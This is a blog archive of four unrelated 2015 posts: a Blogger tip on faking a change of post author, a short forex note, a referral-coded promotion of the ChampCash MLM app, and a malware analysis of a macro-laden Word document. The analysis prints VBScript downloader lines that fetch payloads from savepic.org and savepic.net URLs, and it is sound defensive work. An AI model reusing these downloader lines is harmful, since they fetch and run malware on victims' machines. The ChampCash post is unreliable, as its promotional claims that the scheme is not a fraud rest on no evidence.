Thursday, 28 May 2015

How to change the author for a published blog-post

This article explains how to change the author of a post that has already been published in Blogger.

Blogger posts and changing post-authors

When you Publish a post in Blogger, a number of features are set up for the post, as well as the contents.  These include:

Some of these can be changed by editing the published post.

But there are some features that cannot be altered after they are set.

In particular, Author is not changed even if a different Google account is used to edit the post - or if the original author has their permission to write to the blog removed.

This can lead to interesting situations on multi-author blogs, especially when one writer leaves the team and perhaps even deletes their Google account.   Because of this, some blog owners choose to not show the "Posted-by"field (set on the Layout > Blog Posts edit > "Posted by" option).

But even if post-author is not displayed on the blog, it is useful for administrator to know who exactly posted each post.

That said, when someone asks how to change the posted-by (ie author) value, the simple, and correct, answer is "You can't."

But there is a way to make it look like the author has been changed, so that only the most eagle-eyed readers will be able to tell the difference.


How to change the author of an existing blog-post

In short, you need to make a new post with the same contents, and then use a custom-redirect so that anyone who tries to look at the old post (eg by following a link to it) is automatically taken to the new post.


Follow these steps:

You need to take note of several values during this procedure, which are used later on. It may good to open a text-editor (eg Notepad) before you start.


1   Look at the URL of the existing post, and note the part that is from the single-slash after your blog's name,  For example in
http://www.Example.blogspot.com/2012/06/my-post-title   
the part you are looking for is the bold part, ie "/2012/06/my-post-title" - including the single slash a the start.



2    Edit the existing post, go to the HTML tab and


3    Log in to Blogger with the account that you want to use as the new post author-name.


4    Create a new post, and make sure you have the same setting under Options > Line breaks, to be sure that you get the spacing right.


5   Edit the post to be just like the old one:
  • Put the HTML that you copied into in the HTML view of the new post.
  • Apply any Labels or Location values that applied to the old post.
  • Make the title the same as it was in the old post.
  • Change the date to the same as the old post.


6   Make the URL of the new post similar but not quite the same:
  • Put the value you found in 1 step into the custom-permalink field
  • Add some text to it so that it is not the same as the original value,
    eg make "my-post-title" into "my-post-title1"


7   Publish the post and  note the part of  the post-URL from the single-slash after your blog's name


8   Set up a re-direct from the old post to the new post:
  • Go to Settings > Search Preferences
  • Edit the Custom Redirects
  • Add a new redirection (only needed if you already have some)
  • Enter the value from step 1 into From
  • Enter the value from step 7 into To
  • Tick Permanent
  • Click the save link for this particular re-direction, and then the Save Changes button.

picture of the Settings > Search Preferences > add re-direction settings screen in Google's Blogger tool



9   Check your blog, to make sure that the re-direction is working correctly.


10  Once you are happy that the re-direction is working correctly, delete the old post.
You will need either the existing author account, or a Google account with administrator rights, to do this.   If SEO matters for your blog, then it is good to do it as soon as you can, so you are not penalized for having duplicate content.



What your readers will see

eyeglasses underneath orange RSS chiclet icon
Everyone who is subscribed to your blog's RSS-feed or follow-by-email gadget will see a new post.
(I you don't want this, turn your feed off before you start - but don't forget to turn on again when you are finished!)

Visitors who browse your blog posts will see the "old" post, with the new author, in the original place.

Visitors who try to go directly to the old post via an existing link or from search-engine results will automatically be re-directed to the "new" version of the post. Very observant ones may notice that the URL is slightly different from the original. Most won't.



A quicker way:  get control of the original Author account

The method described above is fiddly and tedious - especially if you want to change the author of many posts.

An alternative is to ask the original author if they still want the Google account  that they used to make the posts. If you are lucky they
  • Don't want it, and 
  • Are willing to hand the password over to you. 

In this case, you could
  1. Quickly change the password (before they change their mind!), and
  2. Edit their profile to the new author name that you would like to have displayed. You may also want to change some other details - and if they are using a Google+ profile and you already have one, then you should probably delete this.

This isn't a total solution, of course: no matter how you edit their profile, it will still be different to your own profile. But it may be better than nothing.




Related Articles

How to edit a post that has already been published

Understanding Google accounts

Copying a post from one blog to another

Giving someone permission to author posts

Changing the publication date for a blogger post

Setting the URL for Blogger posts

Why SEO doesn't matter for some blogs

Sunday, 24 May 2015

AUD/USD 25th MAY 2015 Forex Report


                                                            AUD/USD Primary cycles

As noted in the previous report, AUD rose on the back of the rate cut and hit the MAY highs and stalled

Support now resides around 78 cents:- Monthly 50% level and 2015 Lows.


Based on Commodity prices and their own Primary Cycles, there is still a bias to move lower in 2015, how this effects the AUD for the rest of the year will simply be defined by trading either side of .78cents

Wednesday, 20 May 2015

Champcash : A New Way to Earn Good Money

What is ChampCash?


Champcash is the latest app for android users to earn some extra bucks. Its like a MLM (Multi Level Marketting) scheme, in which you make new members by sending them the link of Champcash app. There is no fee to join this programme, instead you have to install some apps suggested by Champcash to be eligible for earning.


Install Champcash Now

Is Champcash a Fraud ?


I was also concerned about this thing when I first heard about Champcash. I searched for this issue on internet but got nothing. So I concluded that it is not a fraud. 

Try ChampCash

How does Champcash earn and provide incentive to its users?


Champcash gets money from various companies by getting their apps installed on the android devices of users. Champcash distributes a certain percentage of its earning through this MLM scheme. In this way people participate in it and the apps get installed in millions of android smartphones. A number of MLM schemes are running all over the world (example – Amway). Majority of the MLM schemes make good money for those who join it at an initial stage. So don’t wait and Install Champcash on your Android device now.

Be a part of Champcash

How can you withdraw the amount from Champcash?


There are 2 ways to do so. If it’s a small amount that you want to withdraw then you can recharge any mobile with amount minimum $1. But if it’s a large amount then you can withdraw it using wire transfer of paypal transfer. Mobile recharge is done instantly while the 2nd method takes at least a month to get the balance in your bank account. But such amounts are worth waiting to get in your bank account.

How to install Champcash and be eligible for earning ?


Follow the following steps to install Champcash on your Android Smartphone.

  • Install Champcash
  • Open Champcash in your Phone and Signup
  • It may ask you for Sponsor ID / Refer ID. Enter 43718
  • Now it will give you a challenge to install some apps. "Accept the challenge" . You might need to to install 7 to 10 Apps to complete the challenge. This the the most tough step as it takes more that 100 MB of your mobile data and your time. You have to install these apps and then open them for at least 1 minute.
  • Once you complete the above step you will be eligible for earning.
  • Then you can invite your friends to be a part of this scheme.
  • On every successful joining you get $0.5 to $1.5 depending upon your country. You can earn upto 7 levels of joining. But you commission decreases as the depth of level increases. But still it can earn you few good bucks. 

Whats the real benefit of joining Champcash ?


  • Your network works for you. You have to work only during the initial stage. Once some good users have joined under you then they will work for you automatically. Their referrals will automatically add commission in your account up to further several levels.
  • There is no limit for direct joining under you. So there is no limit to earning.
  • It turns your mobile phone into an earning machine.
  • Even if it don't make you a millionaire, it can earn you some extra money.
  • Its a good thing for those who work from home and have internet access on their android smartphone.

Join Champcash Now and earn unlimited.


Wednesday, 13 May 2015

Limit Load, new arcade combat flight simulator

Stealth development might not be very "open-sourceish", but it sometimes makes for some nice surprises in our project showcase forum.

This time it was the completely new open-source game Limit Load, self described as:
A cockpit flight game that is more of an arcade than a sim. The game is built on the Panda3D game engine. It is similar to the ancient games like the classic Wings or the very good Strike Commander. The story and the atmosphere are important elements of the game, so a lot of focus is placed on that too.
Here is some in-game action and it seems quite polished already for such a new game:


Licensing of assets is still a bit of a grey area it seems, but they are fully aware of it:
The game code is licensed under GPL 3, and custom-made game assets under CC-by-SA 4.0. Some of the assets were taken from "free" (as in "not sure in which way") sources on the Internet, so their licensing situation is unclear. Eventually these should be cleared for use or replaced.
So where is my VR kit? :D

Friday, 8 May 2015

New malicious Office docs trick


It all starts with the 1,000,000th usual spam mail in your inbox:

Have you received an order form? No.











The content is as follows:


Dear,

We have received your order form [AY19358KXN]  and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.

As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.

The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.


Attached is a DOC file with (surprise) a macro attached. However, the method's different than usual:


In the past, there have been some other new tricks as well, for example:
Analyzing an MS Word document not detected by AV software
XML: A New Vector For An Old Trick
Malware authors go a step further to access bank accounts

In regards to any Office files, you can simply open the file in Notepad++ for example and you'll see the .mso appended at the end. The new thing here is that it's a Word MHTML file with macro(s).

Using olevba (by @decalage2), we can extract and automatically decode the .mso object - which contains a bunch of (what appears to be) random gibberish:

Function that "Returns the character associated with the specified character code"






You can use the ASCII character code chart to figure out what this malware is doing exactly, for example the first line Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) is simply "HTTP".

Another option is to use a Python program made by Xavier Mertens, deobfuscate_chr.py.
You can find a Pastebin here with the extracted + deobfuscated macro.


Short analysis of this .doc file using olevba












Other tools are available as well, for example oledump and emldump from Didier Stevens.

Emldump + passing through oledump extracted a malicious link











 
Now, what happens when you execute this malicious Word file?

Oops, seems macros are disabled :)







If macros are enabled, or you choose to enable the macro in that document, a Pastebin download link was opened and the file was executed. Process flow is:

Word document -> download VBS from Pastebin -> Execute VBS -> Downloads & executes EXE file -> Downloads & executes another EXE file.

Visually, you might get either of these images:

dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg
















dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg












Dropper, payload, related files:

AY19358KXN.doc (original file)
SHA1: b2c793b1cf2cf11954492fd52e22a3b8a96dac15
VirusTotal

Extracted macro (I named it AY.vb)
SHA1: 79b0d7a7fe917583bc4f73ce1dbffc5497b6974d
VirusTotal

JGuigbjbff3f.vbs (dropped VBscript file)
SHA1: c8a914fdc18d43aabbf84732b97676bd17dc0f54
VirusTotal
Deobfuscated VBscript

o8237423.exe (dropper)
SHA1: 7edc7afb424e6f8fc5fb5bae3681195800ca8330
VirusTotal

DInput8.dll (payload)
SHA1: 8bfe59646bdf6591fa8213b30720553d78357a99
VirusTotal





Prevention



Conclusion

It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email. ;-)

If you're in an organisation, you might want to consider blocking the execution of all macros (or only allow the ones that are digitally signed if there's really no other choice) by using GPO.

You can find those templates here:

Note: starting from Office 2010, macros are disabled by default.


Resources